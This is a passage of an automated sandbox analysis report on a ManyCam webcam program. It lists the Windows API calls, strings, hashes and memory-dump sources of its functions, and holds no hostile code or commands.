                                                                                                                                            • Instruction Fuzzy Hash: 6D31D5719003019BC710EF58E945A5BFBE5FB84750F0049AAFC9897392E770DA45CBA2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _setjmp3fopen
                                                                                                                                            • String ID: 1.2.8
                                                                                                                                            • API String ID: 3541577079-509886058
                                                                                                                                            • Opcode ID: adb9868799435315f0b00e3f04c826028b45790d1e71768f2576cac9f3d66289
                                                                                                                                            • Instruction ID: c1baca16db498710b24e39ce7469ebabd6686764df4fa5d66c8c72bc7c76c9ad
                                                                                                                                            • Opcode Fuzzy Hash: adb9868799435315f0b00e3f04c826028b45790d1e71768f2576cac9f3d66289
                                                                                                                                            • Instruction Fuzzy Hash: 4531A771A402045BDB14DFA98C82BFFF7F8EF89700F1444AEE959A7341D671A9018BE1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651
                                                                                                                                              • Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A415
                                                                                                                                              • Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A437
                                                                                                                                              • Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A455
                                                                                                                                              • Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A47D
                                                                                                                                              • Part of subcall function 0041A3B0: ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530
                                                                                                                                              • Part of subcall function 0041DE10: ??_V@YAXPAX@Z.MSVCR80(0000001F,7EC02BB4,?,?,?,0000001F,00000001,CameraDlg\btn_properties,00000000,?,000003EB), ref: 0041DE55
                                                                                                                                              • Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61
                                                                                                                                              • Part of subcall function 0041AA40: GetWindowLongW.USER32(?,7EC02BB4), ref: 0041AA51
                                                                                                                                              • Part of subcall function 0041E880: SetWindowLongW.USER32(7EC02BB4,00000001,7EC02BB4), ref: 0041E895
                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,000000B2,00000002,000000EC,00000000,000000EC,0000000A,0000000A,0000002D,00000014,00000001,Apply the selection,button,00000000,7EC02BB4), ref: 0041E1F1
                                                                                                                                              • Part of subcall function 0041E8B0: MoveWindow.USER32(?,?,00000000,?,00000000,00000001,-00000003,?,0041E25F,?,00000001,?,?), ref: 0041E8E7
                                                                                                                                              • Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004E), ref: 0041E37B
                                                                                                                                              • Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004F), ref: 0041E386
                                                                                                                                              • Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004C), ref: 0041E391
                                                                                                                                              • Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004D), ref: 0041E3A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$AllocatorDebugHeapMetricsSystem$LongMove$AttributesImage@@ItemLayeredLoad@
                                                                                                                                            • String ID: Apply the selection$button
                                                                                                                                            • API String ID: 70508497-2603280126
                                                                                                                                            • Opcode ID: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
                                                                                                                                            • Instruction ID: 04a5c8e6f4919bc5989b0440a3589c8b02fa676512b2dbfed97fa3f5bca5e94e
                                                                                                                                            • Opcode Fuzzy Hash: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
                                                                                                                                            • Instruction Fuzzy Hash: 6D310B70A40208ABDB08EBA5DD92FADB775AF44718F10011EF502A72D2DB797941CB59
                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 0041EEDD
                                                                                                                                              • Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95
                                                                                                                                              • Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD
                                                                                                                                              • Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
                                                                                                                                              • Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
                                                                                                                                              • Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
                                                                                                                                              • Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D
                                                                                                                                              • Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651
                                                                                                                                              • Part of subcall function 00408120: ??_V@YAXPAX@Z.MSVCR80(?,7EC02BB4,?,?,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 0040815C
                                                                                                                                              • Part of subcall function 00408120: lstrlenW.KERNEL32(0040641C,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 00408172
                                                                                                                                              • Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61
                                                                                                                                            • MoveWindow.USER32(00000000,00000000,00000001,000000E7,0000005F,00000048,00000017,00000001,00000113,00000034,000000C6,00000017,00000001,http://www.manycam.com/codec,00000000,00000211), ref: 0041EF99
                                                                                                                                            Strings
                                                                                                                                            • http://www.manycam.com/codec, xrefs: 0041EF48
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MoveParentSystem$InfoItemLongMetricsParametersRectlstrlen
                                                                                                                                            • String ID: http://www.manycam.com/codec
                                                                                                                                            • API String ID: 3918154117-1165702928
                                                                                                                                            • Opcode ID: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
                                                                                                                                            • Instruction ID: 149f93423e983da9d283a3b54f422c1b69b7f72d1b3e7c1b80e5497dd6e0fc8b
                                                                                                                                            • Opcode Fuzzy Hash: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
                                                                                                                                            • Instruction Fuzzy Hash: 5C110D70B802096BFB18E7A5CC67FBE7225AF44708F00042DB717BA2C2DAB96520865D
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000,00000000), ref: 004C4AD1
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000), ref: 004C4AEE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: X?S
                                                                                                                                            • API String ID: 3215553584-928156776
                                                                                                                                            • Opcode ID: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
                                                                                                                                            • Instruction ID: 6e252d52473bf057cc5c9ab3544af976a75f27afc912d5b1b1ccf3972680467b
                                                                                                                                            • Opcode Fuzzy Hash: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
                                                                                                                                            • Instruction Fuzzy Hash: 7B214178E00204EFCB44EFA5C6A0E6FBB75AF89315B14819EE4055B311D738EE41CBA8
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6,000000FF), ref: 00490EA1
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(00000003,?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6), ref: 00490EBE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: _1I
                                                                                                                                            • API String ID: 3215553584-1375489561
                                                                                                                                            • Opcode ID: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
                                                                                                                                            • Instruction ID: 39ed61a2cd6add22cacd6874f090497504692926125bc87bb284fc13d1f3f6b2
                                                                                                                                            • Opcode Fuzzy Hash: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
                                                                                                                                            • Instruction Fuzzy Hash: 12213E74A00204EFCF04EFA5C58086EBF76AF89315B1489AEE4459B305CB38EA41CBA4
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol
                                                                                                                                            • String ID: Limiting gamma to 21474.83$Setting gamma=0
                                                                                                                                            • API String ID: 2545261903-3311646275
                                                                                                                                            • Opcode ID: 89ce5e07ace49c861ee515791233976caefc075f465c4e2cf9080b59b486ad6e
                                                                                                                                            • Instruction ID: 37371b3f0de86d166cb12df89032bb9bc4556c36e314253a322d46b8821d6196
                                                                                                                                            • Opcode Fuzzy Hash: 89ce5e07ace49c861ee515791233976caefc075f465c4e2cf9080b59b486ad6e
                                                                                                                                            • Instruction Fuzzy Hash: 1FF04470800B4697C3506F09FE016AAB7E4FF83F40F0108CAE4D832269EFB19855AA93
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE2EF
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE32B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: CJ
                                                                                                                                            • API String ID: 3215553584-1577928124
                                                                                                                                            • Opcode ID: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
                                                                                                                                            • Instruction ID: 1e5a07180b79b9d77b03a7b872fd22e8548e40f80d8fa90e55785185c90aae0e
                                                                                                                                            • Opcode Fuzzy Hash: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
                                                                                                                                            • Instruction Fuzzy Hash: A401D731600008DFCB08DF59D694A6EFBB6EF66301F258199E9069B355C734AE50DB88
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E29EF
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E2A25
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: CN
                                                                                                                                            • API String ID: 3215553584-3860229782
                                                                                                                                            • Opcode ID: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
                                                                                                                                            • Instruction ID: 055c263bba3631ac84532d8d275a506bca3ff744e03e32cc4505f628b268f32f
                                                                                                                                            • Opcode Fuzzy Hash: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
                                                                                                                                            • Instruction Fuzzy Hash: 6D110234A00049EFCB14DF45C280DADB7B6FB99305B25C299E8068B315DB31AF46DB84
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C2F
                                                                                                                                            • _invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: C A
                                                                                                                                            • API String ID: 3215553584-432193327
                                                                                                                                            • Opcode ID: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
                                                                                                                                            • Instruction ID: d50c8c72ee7c7c5e73367f5c550ec2d48e9c8be17f747839894a4a99daa275eb
                                                                                                                                            • Opcode Fuzzy Hash: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
                                                                                                                                            • Instruction Fuzzy Hash: 0E01E931600008DFCB08CF48D7D49ADFBB6EF69345B668199E5069B315D730EE90DB98
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: exitfprintf
                                                                                                                                            • String ID: %s
                                                                                                                                            • API String ID: 4243785698-620797490
                                                                                                                                            • Opcode ID: fd9c6deb79413dfe1ad62202f921903fad40581ddfb75f7c5f3d252542e5ceab
                                                                                                                                            • Instruction ID: 4747bd8bf3161ecfdfd19d01b1040ceb503386d2748ece7f77148f724db0457d
                                                                                                                                            • Opcode Fuzzy Hash: fd9c6deb79413dfe1ad62202f921903fad40581ddfb75f7c5f3d252542e5ceab
                                                                                                                                            • Instruction Fuzzy Hash: 8EF0A735401211AFD300EF64DC48E9AB7F8EF89301F008459F485A3261EB75D805CB56